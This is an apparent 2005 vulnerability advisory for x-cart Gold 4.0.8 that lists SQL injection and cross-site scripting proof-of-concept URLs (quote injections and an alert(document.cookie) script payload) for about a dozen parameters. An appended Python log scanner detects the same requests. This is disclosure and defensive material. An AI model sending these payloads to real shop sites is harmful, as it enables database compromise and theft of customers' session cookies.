Network Security Vuln-Dev

Multiple vulnerabilities in x-cart Gold

Subject: Multiple vulnerabilities in x-cart Gold
Date: 31 May 2005 03:38:16 -0000


SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                  Title: Multiple vulnerabilities in x-cart Gold 
                Program: x-cart Gold
     Vulnerable version: 4.0.8
               Homepage: www.x-cart.com
             Date found: 29.05.05
               Found by: CENSORED / SVT / www.svt.nukleon.us
===================================================================== 
Description
 
SQL - injections 
--------------- 
While researching the product, multiple SQL injection vulnerabilities
were found. They affect practically all parameters.
The first flaw was found in the "cat" parameter. The script does not
check this parameter, and substituting a "'" character makes SQL
injection possible. A further flaw was found in the "productid"
parameter: because special characters are not checked, passing a "'"
character in this parameter causes an SQL error, and the script
automatically redirects to a page that reports the error. On that page
the "id" parameter is visible; passing it a "'" character likewise makes
SQL injection possible.
Next is the "mode" parameter: substituting special characters produces
an error, and SQL injection is possible. The "section" parameter is
also affected; SQL injection is possible in it as well.

XSS 
--------------- 
XSS vulnerabilities can be triggered in the same parameters as the
SQL injection flaws.
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================


Conclusion
^^^^^^^^^^^
Research was carried out only on version 4.0.8. Other versions may
also be vulnerable. The vendor has been notified. If you have any
remarks, write to censored@mail.ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
                                          ___
                                ___      /  /
                    ____________\__\___ /  /
                   |   _______________// _/_
               ____|__________   |\  \/ |   |
              /__________________| \____/   |
                                     ___|   |___
                                    |___     ___|
                                        |   |___
                                        |_______|
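
Added example, not part of the original advisory: a defender-side log check that flags requests where one of the script/parameter pairs listed above carries a quote or markup character. It assumes an Apache-style combined access log; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script/parameter pairs taken from the advisory's Example section.
WATCHED = {
    "/home.php": {"cat", "printable"},
    "/product.php": {"productid", "mode"},
    "/error_message.php": {"id"},
    "/help.php": {"section"},
    "/orders.php": {"mode"},
    "/register.php": {"mode"},
    "/search.php": {"mode"},
    "/giftcert.php": {"gcid", "gcindex"},
}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return (script, parameter, reason) tuples for watched parameters
    whose decoded value carries a quote or HTML markup characters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # Match on the file name only: the store may sit in a subdirectory.
    script = "/" + url.path.rsplit("/", 1)[-1].lower()
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name not in WATCHED.get(script, ()):
            continue
        value = unquote(value)  # second pass catches double encoding (%2527)
        if "'" in value:
            hits.append((script, name, "quote"))
        if "<" in value or ">" in value:
            hits.append((script, name, "markup"))
    return hits

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/May/2005:04:01:12 +0000] "GET /home.php?cat=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/May/2005:04:02:40 +0000] "GET /shop/product.php?productid=%27 HTTP/1.1" 302 0',
    '198.51.100.7 - - [31/May/2005:04:02:41 +0000] "GET /shop/error_message.php?access_denied&id=%27%3E%3Cscript%3E HTTP/1.1" 200 830',
    '192.0.2.10 - - [31/May/2005:04:03:05 +0000] "GET /search.php?mode=search&q=o%27brien HTTP/1.1" 200 7741',
    '198.51.100.7 - - [31/May/2005:04:03:30 +0000] "GET /giftcert.php?gcid=%2527 HTTP/1.1" 200 412',
]

def scan(lines):
    """Map 1-based line number -> hits, for lines with at least one hit."""
    return {n: h for n, line in enumerate(lines, 1) if (h := suspicious_params(line))}
```

Restricting the check to the listed parameters keeps ordinary values such as the apostrophe in a search term (sample line 4) from raising an alert.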
